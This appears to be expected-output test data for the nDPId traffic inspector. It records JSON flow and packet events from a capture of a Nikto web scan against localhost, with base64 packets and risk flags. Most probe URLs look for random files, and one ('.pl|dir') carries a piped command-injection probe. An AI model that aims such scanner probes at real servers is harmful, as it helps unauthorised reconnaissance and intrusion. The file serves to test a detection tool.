+00649{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1576420276662,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":198,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":198,"pkt_l4_len":164,"thread_ts_msec":1576420276662,"pkt":"AAAAAAAAAAAAAAAACABFAAC4K79AAEAGEH9\/AAABfwAAAcGMH5CQBxOx8tDDVoAYAED+rAAAAQEICp1m+t6dZvreR0VUIC8gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} +01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276662,"flow_last_seen":1576420276662,"flow_idle_time":7560000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":132,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":132,"midstream":1,"thread_ts_msec":1576420276662,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49548,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7560000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1576420276665,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":238,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":238,"pkt_l4_len":204,"thread_ts_msec":1576420276665,"pkt":"AAAAAAAAAAAAAAAACABFAADgK7lAAEAGEF1\/AAABfwAAAcGOH5AW+BO6KmQtsoAYAED+1AAAAQEICp1m+uGdZvrhR0VUIC8waFhDNlpVRS5yZGYrZGVzdHlwZT1jYWNoZStkZXNmb3JtYXQ9UERGIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01085{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276665,"flow_last_seen":1576420276665,"flow_idle_time":7560000,"flow_min_l4_payload_len":172,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":172,"flow_avg_l4_payload_len":172,"midstream":1,"thread_ts_msec":1576420276665,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49550,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.rdf+destype=cache+desformat=PDF","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1576420276666,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420276666,"pkt":"AAAAAAAAAAAAAAAACABFAADBh\/hAAEAGtDx\/AAABfwAAAcGQH5AhqL\/5vbvzaYAYAED+tQAAAQEICp1m+uKdZvriR0VUIC8uMGhYQzZaVUUgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276666,"flow_last_seen":1576420276666,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420276666,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49552,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/.0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1576420276667,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420276667,"pkt":"AAAAAAAAAAAAAAAACABFAADA3LVAAEAGX4B\/AAABfwAAAcGSH5CmzuS+LKoqroAYAED+tAAAAQEICp1m+uOdZvrjR0VUIC8waFhDNlpVRSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01053{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276667,"flow_last_seen":1576420276667,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420276667,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49554,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1576420276668,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276668,"pkt":"AAAAAAAAAAAAAAAACABFAADHxyBAAEAGdQ5\/AAABfwAAAcGUH5ATo\/8SaEXHToAYAED+uwAAAQEICp1m+uSdZvrkR0VUIC8waFhDNlpVRS5wbHxkaXIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276668,"flow_last_seen":1576420276668,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276668,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49556,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.pl|dir","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1576420276669,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276669,"pkt":"AAAAAAAAAAAAAAAACABFAADE5o1AAEAGVaR\/AAABfwAAAcGWH5C1696FBSsDZ4AYAED+uAAAAQEICp1m+uWdZvrlR0VUIC8waFhDNlpVRS50eHQgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276669,"flow_last_seen":1576420276669,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276669,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49558,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1576420276672,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276672,"pkt":"AAAAAAAAAAAAAAAACABFAADEp8RAAEAGlG1\/AAABfwAAAcGYH5CQgZ\/Tf1wQGoAYAED+uAAAAQEICp1m+uidZvroR0VUIC8waFhDNlpVRS5pZGMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptYXBfY29kZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276672,"flow_last_seen":1576420276672,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276672,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49560,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1576420276673,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420276673,"pkt":"AAAAAAAAAAAAAAAACABFAADOZZhAAEAG1o9\/AAABfwAAAcGaH5DBdl2HfBCdbYAYAED+wgAAAQEICp1m+umdZvrpR0VUIC8waFhDNlpVRS5CQm9hcmRTZXJ2bGV0IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bWFwX2NvZGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":10,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276673,"flow_last_seen":1576420276673,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276673,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49562,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.BBoardServlet","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1576420276675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276675,"pkt":"AAAAAAAAAAAAAAAACABFAADE9v9AAEAGRTJ\/AAABfwAAAcGcH5BsDc7u0ozjzoAYAED+uAAAAQEICp1m+uqdZvrqR0VUIC8waFhDNlpVRS5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276675,"flow_last_seen":1576420276675,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276675,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49564,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1576420276676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276676,"pkt":"AAAAAAAAAAAAAAAACABFAADHEPBAAEAGKz9\/AAABfwAAAcGeH5DFGykA4SBK+YAYAED+uwAAAQEICp1m+uydZvrsR0VUIC8waFhDNlpVRS4xMDoxMDAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":12,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276676,"flow_last_seen":1576420276676,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276676,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49566,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.10:100","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00669{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1576420276677,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420276677,"pkt":"AAAAAAAAAAAAAAAACABFAADECABAAEAGNDJ\/AAABfwAAAcGgH5BVFT\/w+l\/OFYAYAED+uAAAAQEICp1m+u2dZvrtR0VUIC8waFhDNlpVRS5leGUgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om1hcF9jb2RlcykNCg0K"} +01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276677,"flow_last_seen":1576420276677,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420276677,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49568,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0hXC6ZUE.exe","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:map_codes)"}} 